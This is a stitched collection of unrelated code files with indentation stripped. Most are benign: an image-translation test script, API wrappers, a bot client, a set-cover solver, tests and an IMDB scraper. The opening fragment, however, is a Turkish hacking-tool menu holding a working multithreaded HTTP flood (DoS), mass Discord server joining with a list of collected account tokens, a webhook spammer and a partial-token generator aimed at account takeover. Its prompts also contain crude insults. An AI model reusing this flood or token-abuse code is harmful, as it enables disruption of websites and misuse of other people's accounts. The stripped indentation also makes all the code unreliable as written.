Spinner()
print(Fore.RED+"bu sadece tokenın ilk baştaki karakterleri verir 2 faktörlü doğrulamalı hesaplarda kullanılamaz")
import base64
userid = input(Fore.LIGHTYELLOW_EX+" İd gir : ")
encodedBytes = base64.b64encode(userid.encode("utf-8"))
encodedStr = str(encodedBytes, "utf-8")
print(Fore.LIGHTYELLOW_EX+f'\n tokenın başı: {encodedStr}')
if x =="8":
Spinner()
print("bazı hatalar olabilir eğer sıkıntı olursa bize ulaşınız")
print("site giriniz https://casperss.cf şeklinde")
x = input()
print("hangi klasör e kaydetmek istiyorsunuz")
y = input()
base_dir = os.getcwd()
site_name = x
project_name = y
project_path = "../" + project_name
os.makedirs(project_path, exist_ok=True)
visited_links = []
error_links = []
def save(bs, element, check):
links = bs.find_all(element)
for l in links:
href = l.get("href")
if href is not None and href not in visited_links:
if check in href:
href = l.get("href")
print("indiriliyor: {}".format(href))
if "//" in href:
path_s = href.split("/")
file_name = ""
for i in range(3, len(path_s)):
file_name = file_name + "/" + path_s[i]
else:
file_name = href
l = site_name + file_name
try:
r = requests.get(l)
except requests.exceptions.ConnectionError:
error_links.append(l)
continue
if r.status_code != 200:
error_links.append(l)
continue
os.makedirs(os.path.dirname(project_path + file_name.split("?")[0]), exist_ok=True)
with open(project_path + file_name.split("?")[0], "wb") as f:
f.write(r.text.encode('utf-8'))
f.close()
visited_links.append(l)
def save_assets(html_text):
bs = BeautifulSoup(html_text, "html.parser")
save(bs=bs, element="link", check=".css")
save(bs=bs, element="script", check=".js")
links = bs.find_all("img")
for l in links:
href = l.get("src")
if href is not None and href not in visited_links:
print("indiriliyor : {}".format(href))
if "//" in href:
path_s = href.split("/")
file_name = ""
for i in range(3, len(path_s)):
file_name = file_name + "/" + path_s[i]
else:
file_name = href
l = site_name + file_name
try:
r = requests.get(l, stream=True)
except requests.exceptions.ConnectionError:
error_links.append(l)
continue
if r.status_code != 200:
error_links.append(l)
continue
os.makedirs(os.path.dirname(project_path + file_name.split("?")[0]), exist_ok=True)
with open(project_path + file_name.split("?")[0], "wb") as f:
shutil.copyfileobj(r.raw, f)
visited_links.append(l)
def crawl(link):
if "http://" not in link and "https://" not in link:
link = site_name + link
if site_name in link and link not in visited_links:
print("indiriliyor : {}".format(link))
path_s = link.split("/")
file_name = ""
for i in range(3, len(path_s)):
file_name = file_name + "/" + path_s[i]
if file_name[len(file_name) - 1] != "/":
file_name = file_name + "/"
try:
r = requests.get(link)
except requests.exceptions.ConnectionError:
print("bağlantı hatası (cloudflare under attack mode açık olabilir)")
sys.exit(1)
if r.status_code != 200:
print("site yanlış")
sys.exit(1)
print(project_path + file_name + "index.html")
os.makedirs(os.path.dirname(project_path + file_name.split("?")[0]), exist_ok=True)
with open(project_path + file_name.split("?")[0] + "index.html", "wb") as f:
text = r.text.replace(site_name, project_name)
f.write(text.encode('utf-8'))
f.close()
visited_links.append(link)
save_assets(r.text)
soup = BeautifulSoup(r.text, "html.parser")
for link in soup.find_all('a'):
try:
crawl(link.get("href"))
except:
error_links.append(link.get("href"))
crawl(site_name + "/")
for link in visited_links:
print("---- {}\n".format(link))
print("\n\n\nhata\n")
for link in error_links:
print("---- {}\n".format(link))
if x == "9":
Spinner()
ddoser = input("Hedef site giriniz örnek.com:")
import socket
import threading
ip = get('https://api.ipify.org').text
target = 'casperss.cf'
fake_ip = ip
port = 80
attack_num = 0
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
global attack_num
attack_num += 1
print(attack_num)
s.close()
for i in range(500):
thread = threading.Thread(target=attack)
thread.start()
attack_num = 0
if x == "10":
Spinner()
print(Fore.MAGENTA + "[1] Token sese sokma")
print(Fore.MAGENTA + "[2] Token yayına sokma")
print(Fore.MAGENTA + "[3] Token sunucuya sokma")
print(Fore.MAGENTA + "[4] About me kısımlarına yazı yazma")
supra = input()
if supra == "3":
print("tokenler.txt ye tokenlarını at")
print("discord invite link giriniz lütfen sadece davet kodunu atınız ( örnek = 21312dwadqw)")
ananxd = input()
tokens = []
with open("tokenler.txt", "r") as tokens_file:
lines = tokens_file.readlines()
for l in lines:
token = tokens.append(l.replace('\n', ''))
def bot_inviter(ananxd,token):
apilink = "https://discordapp.com/api/v6/invite/" + ananxd
headers = {'Authorization': token}
bot_invite = requests.post(apilink, headers=headers)
print(bot_invite.text)
for botz in tokens:
bot_inviter(ananxd, botz)
if supra =="1":
import discord
class MyClient(discord.Client):
async def on_ready(self):
print('Logged on as', self.user)
time.sleep(5)
print('Bot joined the channel.')
channel_id = '929783813024935941'
voice_channel = client.get_channel(channel_id)
await voice_channel.connect()
async def on_message(self, message):
# don't respond to ourselves
if message.author == self.user:
return
if message.content == 'ping':
await message.channel.send('pong')
client = MyClient()
client.run('')
print("çabuk çabuk ses kanalıan gir oç")
if x == "11":
import time
import requests
import pyfiglet
banner = pyfiglet.figlet_format("WEBHOOK SPAMMER")
print(banner)
msg = input("ne spamlamasını istiyorsun keke:")
webhook = input()
def kırbaçlaonu(msg, webhook):
while True:
try:
data = requests.post(webhook, json={'content': msg})
if data.status_code == 204:
print(f"gonderildu{msg}")
except:
print("webhook bozuk:" + webhook)
time.sleep(5)
exit()
anan = 1
while anan == 1:
kırbaçlaonu(msg, webhook)
| 2.421875
| 2
|
main/permissions.py
|
sultanalieva-s/discrourse
| 0
|
12782859
|
<reponame>sultanalieva-s/discrourse
# from rest_framework.permissions import BasePermission
#
#
# class IsOwner(BasePermission):
#
# def has_object_permission(self, req, view, obj):
# return req.user.is_authenticated and req.user == obj.author
#
| 2.109375
| 2
|
test_wsi.py
|
jlevy44/HE2Tri
| 1
|
12782860
|
<filename>test_wsi.py
"""General-purpose test script for image-to-image translation.
Once you have trained your model with train.py, you can use this script to test the model.
It will load a saved model from --checkpoints_dir and save the results to --results_dir.
It first creates model and dataset given the option. It will hard-code some parameters.
It then runs inference for --num_test images and saves the results to an HTML file.
Example (You need to train models first or download pre-trained models from our website):
Test a CycleGAN model (both sides):
python test.py --dataroot ./datasets/maps --name maps_cyclegan --model cycle_gan
Test a CycleGAN model (one side only):
python test.py --dataroot datasets/horse2zebra/testA --name horse2zebra_pretrained --model test --no_dropout
The option '--model test' is used for generating CycleGAN results only for one side.
This option will automatically set '--dataset_mode single', which only loads the images from one set.
On the contrary, using '--model cycle_gan' requires loading and generating results in both directions,
which is sometimes unnecessary. The results will be saved at ./results/.
Use '--results_dir <directory_path_to_save_result>' to specify the results directory.
Test a pix2pix model:
python test.py --dataroot ./datasets/facades --name facades_pix2pix --model pix2pix --direction BtoA
See options/base_options.py and options/test_options.py for more test options.
See training and test tips at: https://github.com/junyanz/pytorch-CycleGAN-and-pix2pix/blob/master/docs/tips.md
See frequently asked questions at: https://github.com/junyanz/pytorch-CycleGAN-and-pix2pix/blob/master/docs/qa.md
"""
import os
from options.test_wsi_options import TestWSIOptions
from data import create_dataset
from models import create_model
from util.visualizer import save_images
from util import html
import numpy as np
import cv2
import subprocess
import time
from tqdm import tqdm
if __name__ == '__main__':
PROGRAM_START_TIME = time.time()
opt = TestWSIOptions().parse() # get test options
# hard-code some parameters for test
opt.num_threads = 0 # test code only supports num_threads = 0
opt.batch_size = 1 # test code only supports batch_size = 1
opt.serial_batches = True # disable data shuffling; comment this line if results on randomly chosen images are needed.
opt.no_flip = True # no flip; comment this line if results on flipped images are needed.
opt.display_id = -1 # no visdom display; the test code saves the results to an HTML file.
dataset = create_dataset(opt) # create a dataset given opt.dataset_mode and other options
total_iter = opt.load_iter + 1
start_iter = opt.iter_start
if start_iter < 0:
start_iter = opt.load_iter # fall back to the loaded iteration; the original assigned opt.iter_start here, leaving start_iter negative
opt.iter_incr = 1
model = create_model(opt)
if opt.dataset_mode=="wsi":
for iter in range(start_iter, total_iter, opt.iter_incr):
opt.load_iter = iter
print("iter", opt.load_iter)
ITER_START_TIME = time.time()
dataset.dataset.reset()
# create save location for results
subfolder_name = '{}_{}'.format(opt.phase, opt.epoch)
if True: # opt.load_iter > 0: # load_iter is 0 by default
subfolder_name = '{:s}_iter{:d}'.format(subfolder_name, opt.load_iter)
web_dir = os.path.join(opt.results_dir, opt.name, subfolder_name)
new_wsi_filename = opt.wsi_name.replace('.npy', '_converted.npy')
save_path = os.path.join(web_dir, "images", new_wsi_filename)
print('save_path', save_path)
print('creating web directory', web_dir)
webpage = html.HTML(web_dir, 'Experiment = %s, Phase = %s, Epoch = %s' % (opt.name, opt.phase, opt.epoch))
# create a model given opt.model and other options
model.setup(opt) # regular setup: load and print networks; create schedulers
# test with eval mode. This only affects layers like batchnorm and dropout.
# For [pix2pix]: we use batchnorm and dropout in the original pix2pix. You can experiment it with and without eval() mode.
# For [CycleGAN]: It should not affect CycleGAN as CycleGAN uses instancenorm without dropout.
if opt.eval:
model.eval()
output=[]
for i, data in enumerate(dataset):
model.set_input(data) # unpack data from data loader
model.test() # run inference
img=((model.fake.detach().cpu().numpy()[0].transpose((1,2,0)) + 1.) / 2. * 255.).astype(np.uint8)
dataset.dataset.push_image(i, img)
# if i % 50 == 0:
# print('processing {} - th patch'.format(i))
img_new = dataset.dataset.apply_mask()
np.save(save_path, img_new)
# subprocess.call("python npy2dzi.py --wsi_name {} --web_dir {} --shrink_factor {}".format(new_wsi_filename, web_dir, opt.shrink_factor), shell=True)
print("Iter execution time (s)", time.time() - ITER_START_TIME)
elif opt.dataset_mode=="npy":
# opt.load_iter = iter
# print("iter", opt.load_iter)
ITER_START_TIME = time.time()
# dataset.dataset.reset()
# create save location for results
# subfolder_name = '{}_{}'.format(opt.phase, opt.epoch)
# if True: # opt.load_iter > 0: # load_iter is 0 by default
# subfolder_name = '{:s}_iter{:d}'.format(subfolder_name, opt.load_iter)
# web_dir = os.path.join(opt.results_dir, opt.name, subfolder_name)
save_path = os.path.join(opt.results_dir_wsi,os.path.basename(opt.wsi_name.replace('.npy', '_converted.npy')))
# save_path = os.path.join(web_dir, "images", new_wsi_filename)
# print('save_path', save_path)
# print('creating web directory', web_dir)
# webpage = html.HTML(web_dir, 'Experiment = %s, Phase = %s, Epoch = %s' % (opt.name, opt.phase, opt.epoch))
# model = create_model(opt) # create a model given opt.model and other options
model.setup(opt) # regular setup: load and print networks; create schedulers
# test with eval mode. This only affects layers like batchnorm and dropout.
# For [pix2pix]: we use batchnorm and dropout in the original pix2pix. You can experiment it with and without eval() mode.
# For [CycleGAN]: It should not affect CycleGAN as CycleGAN uses instancenorm without dropout.
if opt.eval:
model.eval()
output=[]
# print(dir(dataset))
# print(dataset.dataset)
for i, data in tqdm(enumerate(dataset),total=len(dataset)):
model.set_input(data) # unpack data from data loader
model.test() # run inference
img=((model.fake.detach().cpu().numpy()[0].transpose((1,2,0)) + 1.) / 2. * 255.).astype(np.uint8)
dataset.dataset.push_image(i, img)
# if i % 50 == 0:
# print('processing {} - th patch'.format(i))
img_new = dataset.dataset.img_new
np.save(save_path, img_new)
# subprocess.call("python npy2dzi.py --wsi_name {} --web_dir {} --shrink_factor {}".format(new_wsi_filename, web_dir, opt.shrink_factor), shell=True)
print("Iter execution time (s)", time.time() - ITER_START_TIME)
print("Total execution time (s)", time.time() - PROGRAM_START_TIME)
| 3.09375
| 3
|
ThreadFixProApi/Applications/_utils/_team.py
|
denimgroup/threadfix-python-api
| 1
|
12782861
|
<reponame>denimgroup/threadfix-python-api
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = "<NAME>"
__copyright__ = "(C) 2019 Denim group"
__contributors__ = ["<NAME>"]
__status__ = "Production"
__license__ = "MIT"
from ...API import API
class TeamsAPI(API):
def __init__(self, host, api_key, verify_ssl, timeout, headers, user_agent, cert, debug):
"""
Initialize a ThreadFix Pro Teams API instance.
:param host: The URL for the ThreadFix Pro server. (e.g., http://localhost:8080/threadfix/) NOTE: must include http:// TODO: make it so that it is required or implicitly added if forgotten
:param api_key: The API key generated on the ThreadFix Pro API Key page.
:param verify_ssl: Specify if API requests will verify the host's SSL certificate, defaults to true.
:param timeout: HTTP timeout in seconds, default is 30.
:param user_agent: HTTP user agent string, default is "threadfix_pro_api/[version]".
:param cert: You can also specify a local cert to use as client side certificate, as a single file (containing
the private key and the certificate) or as a tuple of both files' paths
:param debug: Prints requests and responses, useful for debugging.
"""
super().__init__(host, api_key, verify_ssl, timeout, headers, user_agent, cert, debug)
def create_team(self, name):
"""
Creates a new team
:param name: The name of the new team being created
"""
params = {"name": name}
return super().request('POST', '/teams/new', params, debug=self.debug)
def get_team_by_id(self, team_id):
"""
Retrieves team with id of team_id'
:param team_id: ID of the team being gotten
"""
return super().request('GET', '/teams/' + str(team_id))
def get_team_by_name(self, team_name):
"""
Retrieves team with name of team_name
:param team_name: Name of the team being gotten
"""
return super().request('GET', '/teams/lookup?name=' + str(team_name))
def get_all_teams(self, page=1, page_size=10000):
"""
Retrieves all the teams.
:param page: Which page of findings to retrieve of size "pageSize"
:param page_size: How many findings to retrieve per "page"
"""
params = {'page' : page, 'pageSize' : page_size}
return super().request('GET', '/teams', params)
def update_team(self, team_id, name):
"""
Updates team with teamId
:param team_id: Team identifier
:param name: New name to assign to the team
"""
params = {'name' : name}
return super().request('PUT', '/teams/' + str(team_id) + '/update', params)
def get_team_event_history(self, team_id, pages=None, page_size=None):
"""
Lists event history for a team
:param team_id: Team identifier
:param pages: Which page of events to retrieve
:param page_size: How many events to retrieve per "page"
"""
params = {}
if pages:
params['page'] = pages
if page_size:
params['pageSize'] = page_size
return super().request('POST', '/events/organization/' + str(team_id), params)
def delete_team(self, team_id):
"""
Deletes a team by the provided teamId
:param team_id: Team identifier
"""
return super().request('DELETE', '/teams/' + str(team_id) + '/delete')
def view_permissible_users_for_team(self, team_id):
"""
Returns a list of users that have access to the given team
:param team_id: Team identifier
"""
# 'DELETE' here looks like a copy-paste slip for a read-only lookup
return super().request('GET', '/teams/' + str(team_id) + '/users')
def get_event_history_for_team(self, team_id, page=10, number_to_show=20):
"""
Returns list of events for a particular team
:param team_id: ID of team to get history from
:param page: Which page of events to retrieve
:param number_to_show: How many events to retrieve per "page". If not specified, the default limit is 20
"""
params = {'page' : page, 'numberToShow' : number_to_show}
return super().request('POST', '/history/teams/' + str(team_id) + '/history/objects', params)
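# Hypothetical usage sketch (constructor arguments shown with the names
# documented above; values are placeholders):
# api = TeamsAPI('http://localhost:8080/threadfix/', api_key, verify_ssl=True,
#                timeout=30, headers=None, user_agent=None, cert=None, debug=False)
# team = api.create_team('Security')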
| 2.40625
| 2
|
two-sum.py
|
ibigbug/leetcode
| 0
|
12782862
|
<gh_stars>0
# Link: https://oj.leetcode.com/problems/two-sum/
class Solution:
# @return a tuple, (index1, index2)
def twoSum(self, num, target):
"""
use hashtable
"""
d = {}
index1 = index2 = 0
for i in range(0, len(num)):
if (target - num[i]) in d:
index1 = d[target - num[i]]
index2 = i
break
else:
d[num[i]] = i
return (index1 + 1, index2 + 1)
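# Example (indices are 1-based, per the old LeetCode contract):
# Solution().twoSum([2, 7, 11, 15], 9)  # -> (1, 2)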
| 3.390625
| 3
|
src/programy/clients/restful/asyncio/microsoft/client.py
|
motazsaad/fit-bot-fb-clt
| 0
|
12782863
|
"""
Copyright (c) 2016-2019 <NAME> http://www.keithsterling.com
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from programy.utils.logging.ylogger import YLogger
import http.server
import json
import asyncio
from botbuilder.schema import (Activity, ActivityTypes)
from botframework.connector import ConnectorClient
from botframework.connector.auth import (MicrosoftAppCredentials, JwtTokenValidation, SimpleCredentialProvider)
from programy.clients.restful.flask.client import FlaskRestBotClient
from programy.clients.restful.asyncio.microsoft.config import MicrosoftConfiguration
class MicrosoftBotClient(FlaskRestBotClient):
def __init__(self, argument_parser=None):
FlaskRestBotClient.__init__(self, 'microsoft', argument_parser)
YLogger.debug(self, "Microsoft Client is running....")
print("Microsoft Client loaded")
def get_client_configuration(self):
return MicrosoftConfiguration()
def get_microsoft_app_id(self):
return self.license_keys.get_key("MICROSOFT_APP_ID")
def get_microsoft_app_password(self):
return self.license_keys.get_key("MICROSOFT_APP_PASSWORD")
def get_new_user_message(self):
if self.configuration.client_configuration.new_user_srai is not None:
pass
return self.configuration.client_configuration.new_user_text
def ask_question(self, question):
reply = ""
try:
client_context = self.create_client_context("microsoft")
self._questions += 1
reply = client_context.bot.ask_question(client_context, question, responselogger=self)
except Exception as e:
YLogger.exception(client_context, "Error getting reply from bot", e)
return reply
MICROSOFT_CLIENT = MicrosoftBotClient()
class BotRequestHandler(http.server.BaseHTTPRequestHandler):
@staticmethod
def __create_reply_activity(request_activity, text):
return Activity(
type=ActivityTypes.message,
channel_id=request_activity.channel_id,
conversation=request_activity.conversation,
recipient=request_activity.from_property,
from_property=request_activity.recipient,
text=text,
service_url=request_activity.service_url)
def __handle_conversation_update_activity(self, activity):
self.send_response(202)
self.end_headers()
if len(activity.members_added):
if activity.members_added[0].id != activity.recipient.id:
credentials = MicrosoftAppCredentials(MICROSOFT_CLIENT.get_microsoft_app_id(),
MICROSOFT_CLIENT.get_microsoft_app_password())
response = MICROSOFT_CLIENT.get_new_user_message()
reply = BotRequestHandler.__create_reply_activity(activity, response)
connector = ConnectorClient(credentials, base_url=reply.service_url)
connector.conversations.send_to_conversation(reply.conversation.id, reply)
def __handle_message_activity(self, activity):
self.send_response(200)
self.end_headers()
credentials = MicrosoftAppCredentials(MICROSOFT_CLIENT.get_microsoft_app_id(),
MICROSOFT_CLIENT.get_microsoft_app_password())
connector = ConnectorClient(credentials, base_url=activity.service_url)
response = MICROSOFT_CLIENT.ask_question(activity.text)
reply = BotRequestHandler.__create_reply_activity(activity, response)
connector.conversations.send_to_conversation(reply.conversation.id, reply)
def __handle_authentication(self, activity):
credential_provider = SimpleCredentialProvider(MICROSOFT_CLIENT.get_microsoft_app_id(),
MICROSOFT_CLIENT.get_microsoft_app_password())
loop = asyncio.new_event_loop()
try:
loop.run_until_complete(JwtTokenValidation.authenticate_request(activity,
self.headers.get("Authorization"),
credential_provider))
return True
except Exception as ex:
self.send_response(401, ex)
self.end_headers()
return False
finally:
loop.close()
def __unhandled_activity(self):
self.send_response(404)
self.end_headers()
def do_POST(self):
body = self.rfile.read(int(self.headers['Content-Length']))
data = json.loads(str(body, 'utf-8'))
activity = Activity.deserialize(data)
if not self.__handle_authentication(activity):
return
if activity.type == ActivityTypes.conversation_update.value:
self.__handle_conversation_update_activity(activity)
elif activity.type == ActivityTypes.message.value:
self.__handle_message_activity(activity)
else:
self.__unhandled_activity()
if __name__ == '__main__':
print("Initiating Microsoft Client...")
SERVER = None
try:
host = MICROSOFT_CLIENT.configuration.client_configuration.host
port = MICROSOFT_CLIENT.configuration.client_configuration.port
SERVER = http.server.HTTPServer((host, port), BotRequestHandler)
print('Started http server')
SERVER.serve_forever()
except KeyboardInterrupt:
print('Ctrl-C received, shutting down server')
if SERVER is not None:
SERVER.socket.close()
| 1.523438
| 2
|
other/dingding/dingtalk/api/rest/OapiFinanceIdCardOcrRequest.py
|
hth945/pytest
| 0
|
12782864
|
'''
Created by auto_sdk on 2021.01.26
'''
from dingtalk.api.base import RestApi
class OapiFinanceIdCardOcrRequest(RestApi):
def __init__(self,url=None):
RestApi.__init__(self,url)
self.back_picture_url = None
self.front_picture_url = None
self.id_card_no = None
self.request_id = None
self.user_mobile = None
def getHttpMethod(self):
return 'POST'
def getapiname(self):
return 'dingtalk.oapi.finance.IdCard.ocr'
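# Hypothetical usage sketch: the request object only carries the fields set
# in __init__ above; actually executing it through the SDK's client is
# assumed and not shown here.
# req = OapiFinanceIdCardOcrRequest()
# req.front_picture_url = 'https://example.com/front.jpg'
# req.back_picture_url = 'https://example.com/back.jpg'
# req.request_id = 'req-001'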
| 1.898438
| 2
|
plugin/src/test/resources/refactoring/extractmethod/Comment2.before.py
|
consulo/consulo-python
| 0
|
12782865
|
<reponame>consulo/consulo-python
class Foo():
<selection>tmp = "!" #try to extract this assignmet, either with or without this comment</selection>
def bar(self):
pass
| 1.46875
| 1
|
utils.py
|
jiuthree/speaker_recognition
| 0
|
12782866
|
<filename>utils.py<gh_stars>0
from scipy.io import wavfile
import soundfile as sf
#import librosa
def read_wav(fname):
signal, fs = sf.read(fname)  # note: return order differs from wavfile.read; the second value, fs, is the audio sample rate
# fs, signal = wavfile.read(fname);
print(fname)
if len(signal.shape) != 1:
print("convert stereo to mono")
signal = signal[:,0]
return fs, signal
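# Example:
# fs, signal = read_wav('speech.wav')  # signal is mono after the conversion above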
| 2.765625
| 3
|
Rozdzial_4/r4_01.py
|
abixadamj/helion-python
| 1
|
12782867
|
# program r4_01.py
# Check whether the required external libraries are installed
# Import helper functions
from sys import exit
from r4_functions import *
load_module_ok = True
try:
import numpy as np
ok_module_info("numpy")
except:
error_module_info("numpy")
load_module_ok = False
try:
import matplotlib
ok_module_info("matplotlib")
except:
err_module_info("matplotlib")
load_module_ok = False
try:
from astropy.time import Time
ok_module_info("astropy")
except:
error_module_info("astropy")
load_module_ok = False
try:
from astroquery.jplhorizons import Horizons
ok_module_info("astroquery")
except:
error_module_info("astroquery")
load_module_ok = False
if not load_module_ok:
print("Niestety, wystąpiły błędy.")
print("Nie mogę dalej działać.")
exit(0)
# All required modules are now installed
print("Great! We are ready to go.")
| 2.25
| 2
|
cp_homebrew_003/cp_state.py
|
DmitriKudryashov/setcover
| 86
|
12782868
|
#!/usr/bin/env python
# encoding: utf-8
from collections import defaultdict
from cp_estimator import Estimator
class State(object):
def __init__(self, estimator, set2items, item2sets,
parent=None, picked_set=None, decision=None):
# Don't use this constructor directly. Use .from_task() instead
self.estimator = estimator # just copy the pointer from the parent for fast access
self.set2items = set2items # {set_index: set(indexes of not covered items)}
self.item2sets = item2sets # {item_index: set(indexes of sets that can cover the item and have no decision yet)}
self.parent = parent # parent state object
self.picked_set = picked_set # picked set index
self.decision = decision # whether we build picked_set or not
self.is_feasible = True
if decision:
self.chosen_sets = {picked_set}
else:
self.chosen_sets = set()
self.propagate_constraints()
if self.is_feasible:
self.recalc_cost()
def recalc_cost(self):
additional = self.estimator.cost_of_chosen_list(self.chosen_sets)
if self.parent is None:
self.current_cost = additional
else:
self.current_cost = self.parent.current_cost + additional
@classmethod
def from_task(cls, task):
# Make initial state
estimator = Estimator(task)
set2items = {s.index: set(s.items) for s in task.sets}
item2sets = defaultdict(set)
for set_idx, set_items in set2items.items():  # .items() for Python 3 (was .iteritems())
for item_idx in set_items:
item2sets[item_idx].add(set_idx)
return cls(estimator, set2items, dict(item2sets),
parent=None, picked_set=None, decision=False)
def __repr__(self):
return 'State(picked={},chosen={})'.format(self.picked_set, self.decision)
# Search
def next_child(self):
picked_set = self.estimator.pick_a_set(self)
return self.create_child(picked_set, decision=True)
def create_child(self, picked_set, decision):
set2items = {s: i.copy() for s, i in self.set2items.items()} # Copy for mutating in child state
item2sets = {i: s.copy() for i, s in self.item2sets.items()} # TODO: Copy is expensive. Can we avoid it?
return self.__class__(self.estimator, set2items, item2sets,
parent=self, picked_set=picked_set, decision=decision)
def negate(self):
# Generate sibling state, where picked_set is not chosen
# If we already there, rollback to the parent state and repeat on it
state = self
while state:
if state.decision:
return state.parent.create_child(state.picked_set, decision=False)
else:
state = state.parent
return None # if we eventually get state = None, we have reached the initial state
# Constraints propagation
def propagate_constraints(self):
if self.decision:
self.propagate_on_choice()
else:
self.propagate_on_toss()
def propagate_on_choice(self):
self.on_sets_chosen(self.chosen_sets) # there is only one set in chosen_sets (picked_set)
def propagate_on_toss(self):
if self.picked_set is not None: # "if we are not at the init state"
orphaned_items = self.set2items.pop(self.picked_set)
for item_idx in orphaned_items:
sets = self.item2sets[item_idx]
sets.remove(self.picked_set)
if not sets:
self.is_feasible = False
# We can't cover the item.
# No matter what else happens, this state cannot lead to a feasible solution
return
# before = len(self.set2items)
# self.remove_expensive_subsets(orphaned_items, # Too expensive calculations :o(
# self.estimator.cost_of_chosen(self.picked_set))
# after = len(self.set2items)
# if after != before:
# self.estimator.metrics['cut_exp'] += 1
# else:
# self.estimator.metrics['not_cut_exp'] += 1
# if not self.is_feasible:
# self.estimator.metrics['rollback_exp'] += 1
# return
# Immediately set 1 for every set that can't be replaced with another set
required_sets = self.detect_required_sets()
self.chosen_sets.update(required_sets)
self.on_sets_chosen(required_sets)
def detect_required_sets(self):
required_sets = set()
for item, sets in self.item2sets.items():
if len(sets) == 1: # only one set can cover this item
required_sets.update(sets)
return required_sets
def on_items_covered(self, to_remove):
overvalued_sets = set()
for item in to_remove:
overvalued_sets.update(self.item2sets.pop(item))
for s in overvalued_sets & set(self.set2items):
items = self.set2items[s]
items -= to_remove
if not items:
del self.set2items[s]
#before = len(self.set2items)
#self.remove_redundant_sets(overvalued_sets & set(self.set2items)) # expensive operation. Work good only on the large datasets
#after = len(self.set2items)
#if after < before:
# print 'profit {}->{}'.format(before, after)
def remove_expensive_subsets(self, items, cost_limit):
        # These items could have been covered at cost=cost_limit, but we chose
        # not to, so covering them with even more expensive subsets is pointless
costs = self.estimator.set_costs
iter_items = iter(items)
candidates = list(self.item2sets[next(iter_items)])
for cand_idx in candidates:
if costs[cand_idx] >= cost_limit:
cand_items = self.set2items[cand_idx]
if len(cand_items) <= len(items) and cand_items <= items:
del self.set2items[cand_idx]
for item_idx in cand_items:
sets = self.item2sets[item_idx]
sets.remove(cand_idx)
if not sets:
self.is_feasible = False
                            return  # We can't cover the item
def on_sets_chosen(self, sets):
covered_items = set()
for s in sets:
covered_items.update(self.set2items.pop(s))
self.on_items_covered(covered_items)
# Getting info
def is_all_covered(self):
return not self.item2sets
def get_optimistic_cost(self):
return self.estimator.get_optimistic(self)
if __name__ == '__main__':
from reader import read_input
from time import time as now
state = State.from_task(read_input('sc_15_0'))
# st = now()
# state.remove_redundant_sets()
# print now() - st
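    # Minimal branch-and-bound sketch (illustrative, with assumed semantics:
    # get_optimistic_cost() is treated as a lower bound on any solution
    # reachable from a state, next_child() deepens the search, and negate()
    # backtracks to the "don't take this set" sibling).
    best_cost, best_state = float('inf'), None
    while state is not None:
        if state.is_feasible and state.get_optimistic_cost() < best_cost:
            if state.is_all_covered():
                best_cost, best_state = state.current_cost, state
                state = state.negate()
            else:
                state = state.next_child()
        else:
            state = state.negate()
    print('best cost found: {}'.format(best_cost))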
| 2.6875
| 3
|
app/display_modules/beta_div/tests/test_module.py
|
MetaGenScope/metagenscope-server
| 0
|
12782869
|
"""Test suite for Beta Diversity display module."""
from app.display_modules.beta_div import BetaDiversityDisplayModule
from app.display_modules.beta_div.models import BetaDiversityResult
from app.display_modules.beta_div import MODULE_NAME
from app.display_modules.display_module_base_test import BaseDisplayModuleTest
from app.tool_results.beta_diversity.models import BetaDiversityToolResult
from app.tool_results.beta_diversity.tests.factory import create_ranks
from tests.utils import add_sample_group
from .factory import BetaDiversityFactory
class TestBetaDivModule(BaseDisplayModuleTest):
"""Test suite for Beta Diversity diplay module."""
def test_add_beta_div(self):
"""Ensure Beta Diversity model is created correctly."""
ranks = create_ranks()
beta_div_result = BetaDiversityResult(data=ranks)
self.generic_adder_test(beta_div_result, MODULE_NAME)
def test_get_beta_div(self):
"""Ensure getting a single Beta Diversity behaves correctly."""
beta_div_result = BetaDiversityFactory()
self.generic_getter_test(beta_div_result, MODULE_NAME,
verify_fields=('data',))
def test_run_beta_div_sample_group(self): # pylint: disable=invalid-name
"""Ensure Beta Diversity run_sample_group produces correct results."""
def create_sample_group():
"""Create unique sample for index i."""
sample_group = add_sample_group(name='SampleGroup01')
ranks = create_ranks()
BetaDiversityToolResult(sample_group_uuid=sample_group.id, data=ranks).save()
return sample_group
self.generic_run_group_test(None,
BetaDiversityDisplayModule,
group_builder=create_sample_group)
| 2.34375
| 2
|
250_indian_movies_imdb/web1.py
|
Pratiknavgurukul/Web_Scraping
| 6
|
12782870
|
import json
import pprint
import requests
from bs4 import BeautifulSoup
url=requests.get("https://www.imdb.com/india/top-rated-indian-movies/?ref_=nv_mv_250_in")
soup=BeautifulSoup(url.text,"lxml")
def scrape_top_list():
tbody= soup.find("tbody",class_="lister-list")
all_movies=[]
for tr in tbody.find_all("tr"):
dic={}
dic["ratting"]=float(tr.find("td",class_="ratingColumn imdbRating").text)
for td in tr.find_all("td",class_="titleColumn"):
nam=""
dic["Url"]="https://www.imdb.com/"+td.find("a")["href"][:16]
nyp=[]
for letter in td.text:
nam+=letter
if letter=="\n":
nyp.append(nam.strip())
nam=""
dic["position"]=int(nyp[1][:-1])
dic["nam"] = str(nyp[2])
dic["year"]=int(nyp[3][1:-1])
all_movies.append(dic)
with open("movies.json","w") as file:
data=json.dumps(all_movies)
file.write(data)
return all_movies
# pprint.pprint(scrape_top_list())
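if __name__ == "__main__":
    # Illustrative entry point: scrape_top_list() also writes movies.json
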